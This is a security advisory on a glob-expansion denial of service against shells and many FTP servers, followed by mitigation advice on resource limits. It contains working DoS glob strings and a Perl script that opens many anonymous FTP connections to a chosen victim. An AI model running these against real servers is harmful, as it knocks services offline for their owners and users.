COMMAND
kernel
SYSTEMS AFFECTED
kernel
PROBLEM
Wakko Ellington Warner-Warner III found the following. If you do:
# ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Wait a few minutes, let the disks churn (it never stops!)
Break out of it...
# vmstat
cannot fork: no swap space
# w
cannot fork: no swap space
Have fun hard-resetting your Sun box... We got the same results
as the original poster on Solaris 2.6 (a SPARC 2 with 32MB of
memory) and the same as Jason on a Linux system (Red Hat 6.2, with
128MB). On the Solaris 2.6 system it would run until it got a:
# ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
no stack space
# uptime
cannot fork: no swap space
and it required a reboot to free it up. But that was only as root;
as a normal user we got the same result as on the Linux system
(which was the same for either root or a regular user).
On Linux Slackware 7.0 your shell gets killed after some time. On
FreeBSD 4.2 GENERIC there is no response from the box. On OpenBSD
2.7 (with softupdates) the hard disk starts making an evil noise
and nothing happens until you control-C the ls after 4 hours (on a
486). On NetBSD 1.5 the shell stops responding to commands. On
Mandrake 7.2 the system becomes very unstable and finally freezes;
you have to hard-reset the computer.
ProFTPD's built-in 'ls' command has a globbing bug that allows a
remote denial of service. Here's a simple exploit, tested on the
ProFTPD site:
$ ftp ftp.proftpd.org
...
Name (ftp.proftpd.org:j): ftp
...
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 Entering Passive Mode (216,10,40,219,4,111).
421 Service not available, remote server timed out. Connection closed
That command takes 100% of the CPU time on the server. It can lead
to an easy DoS even if only a few simultaneous remote connections
are allowed.
Other FTP servers may be affected as well. Here are the results of
various tests:
- NetBSD FTP showed the same behavior as ProFTPD,
- Microsoft FTP showed the same behavior as ProFTPD,
- In an ironic twist, PureFTPd (of which you are apparently the
  author) is indeed vulnerable to this globbing bug, using
  variants of the string you previously posted. Try:
ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/
ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/
- BeroFTPD version 1.3.4 is also vulnerable.
- Safe to say all BSD ftpd's are vulnerable.
- All Solaris boxes are vulnerable.
- The ftpd-BSD-0.2.3-4 port for Linux is also vulnerable.
- The command consumed 100% of CPU cycles and 40% of a Cobalt RaQ
  server's 512MB of RAM (at the time I killed it), running ProFTPD
  1.2.0pre9 on Linux 2.2.14.
- Winsock FTPD 3.00 Pro and 2.41 (maybe prior) are vulnerable.
This is not just an ftpd issue, it's a shell expansion issue. You
can DoS the affected servers with ls issued from the shell as
shown above.
Here are the results with different shells:
- tcsh ran out of memory after 2 or 3 minutes; it used 100% of the
       CPU, to the point of noticeable delays in other running
       jobs.
- csh ran out of memory after 5 or 6 minutes; it used 100% of the
       CPU but didn't seem to cause serious delays.
- bash segfaulted after 6 minutes; it didn't use 100% of the CPU,
       only 20 to 99%, but after 5 minutes it started hammering the
       disk and used far more than one CPU's worth, causing
       significant delays in other jobs.
- ksh was still running when we killed it after 20 minutes; it
       used 100% of the CPU and started using, but not hammering,
       the disk after 10 minutes.
Here is the sample exploit code:
#!/usr/bin/perl -w
# Death accelerator for FTP servers (C) Ninja 2001
# This is for educational purposes only
# All credits go to Gore, my old parakeet who c0des perl better than me
# Just tweak the connections number to bring a swifter death to your machine
# Ain't life a bitch ? Hehe...
use Net::FTP;

if ($#ARGV == -1) {
    # Print usage message
    print("\n Usage: $0 [victim] [port] [connections] \n");
}
else {
    ($victim, $port, $conn) = @ARGV;
    print "Attacking $victim:$port with $conn connections\n";
    for ($i = 0; $i < $conn; $i++) {
        $procid = fork();
        if ($procid == 0) {
            # Child: open one anonymous session and send the glob request
            $ftp = Net::FTP->new("$victim", Port => $port, Passive => 1)
                or exit(1);
            $ftp->login("anonymous", 'bitch@kiddie.box');
            $ftp->ascii();
            $ftp->ls("*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*");
            $ftp->quit();
            # Exit here, otherwise the child re-enters the loop and forks again
            exit(0);
        }
    }
    # Parent: reap all the children before exiting
    1 while wait() != -1;
}
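To run it (the script filename, target host and connection count
below are hypothetical):
$ perl ftpglob.pl ftp.example.com 21 50
Attacking ftp.example.com:21 with 50 connections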
SOLUTION
It's a simple resource starvation issue. The _shell_ process keeps
eating memory as it tries to expand the glob on the command line.
Since root is not subject to resource limits, the shell keeps
eating memory until you are out of swap, and apparently, if you
needed to cold-restart the box, your Solaris setup does not like
running out of swap. So this is just a shell expansion that gets a
little carried away: 'ls ../*' expands to the parent directory's
entries; 'ls ../*/../*' expands, for each of those entries, to the
parent directory's entries again, and so on. Each extra '../*'
multiplies the number of matches by the number of entries in the
parent, a nice little loop as long as the parent directory has a
child (which it obviously does, since we're in one).
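A quick way to see how fast the expansion grows, without wedging
the box, is to count the words the shell produces for each extra
level. This is only an illustrative sketch using a throwaway,
hypothetical test tree of three sibling directories; the exact
counts depend entirely on the directory layout:
$ mkdir -p /tmp/globtest/a /tmp/globtest/b /tmp/globtest/c
$ cd /tmp/globtest/a
$ echo ../* | wc -w
3
$ echo ../*/../* | wc -w
9
$ echo ../*/../*/../* | wc -w
27
Each extra '../*' multiplies the match count by the number of
entries in the parent directory, so a dozen or so levels in a real
filesystem is enough to exhaust memory and swap.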
The machine will only crash if you've instructed it to allow bash
to allocate memory indefinitely. Unless you trust your users not
to be malicious or incompetent you should have kernel-enforced
limits in place to prevent this.
WFTP released 3.00 R4 to fix this vulnerability. [It now refuses
to list any argument containing "/.."]
Set limits on userspace processes (on Red Hat, for example, in
/etc/security/limits.conf) and ensure that your limits reflect the
capabilities of the hardware. Getting this perfect is very hard,
but getting it good enough to deter casual vandals or thoughtless
users is quite easy.
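For example, pam_limits entries like the following cap per-user
address space, CPU time and process count; the numbers are purely
illustrative and must be tuned to the machine:
# /etc/security/limits.conf (illustrative values)
# address space in KB, CPU time in minutes, maximum processes:
*       hard    as      131072
*       hard    cpu     30
*       hard    nproc   100
The same sort of cap can be set for a single shell session:
$ ulimit -v 131072      # virtual memory, in KB
$ ulimit -t 600         # CPU time, in seconds
With limits like these in place the runaway shell is killed when
it hits the cap instead of dragging the whole machine into swap.
As noted above, root is not subject to these limits.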
It is arguable that the FTP daemon is responsible for doing
argument checking to prevent DoS attacks, but bash can hardly be
held to the same standard.
Except for FTP daemons which work in novel ways, this is not even
a denial of service attack. Typically, the parent (listening)
daemon spawns a new process for each control connection. If the
person connected to the daemon then uses the above "attack", they
kill only their own daemon process. They could do the same thing
by logging off. The parent daemon is not affected, nor are other
users currently connected (assuming that there are sane resource
limits in place, of course).
What 'novel' daemons might be affected by this? Those that keep
their own user IDs which are not associated with distinct system
user IDs. In that case the operating system cannot differentiate
between different FTP users, so one user can DoS the others by
exhausting shared resources. However, some very clever daemons
may impose resource limits per user within their own user base,
as the sketch below illustrates.
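ProFTPD, for instance, can cap the resources of each session
process from its own configuration. A minimal sketch, assuming a
build that supports the RLimit* directives; the values are purely
illustrative:
# proftpd.conf fragment (illustrative values)
# CPU seconds and memory allowed per session process:
RLimitCPU        session 30
RLimitMemory     session 8M
# Cap simultaneous control connections per client host:
MaxClientsPerHost 4
A session that blows past these limits is killed without touching
the listening daemon or other connected users.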
Before people start running around trying to filter 'ls' arguments
in the daemon, the correct solution to the "problem" is proper
resource limitations per user (there are undoubtedly other
resource attacks through an FTP daemon too). For users at the
operating system level, most OSes have resource-limiting
capabilities, so it is just a matter of doing it. The real issue
is fixing FTP daemons with their own user bases that do not have
the capability to impose their own per-user resource limits.
That's the only bug here.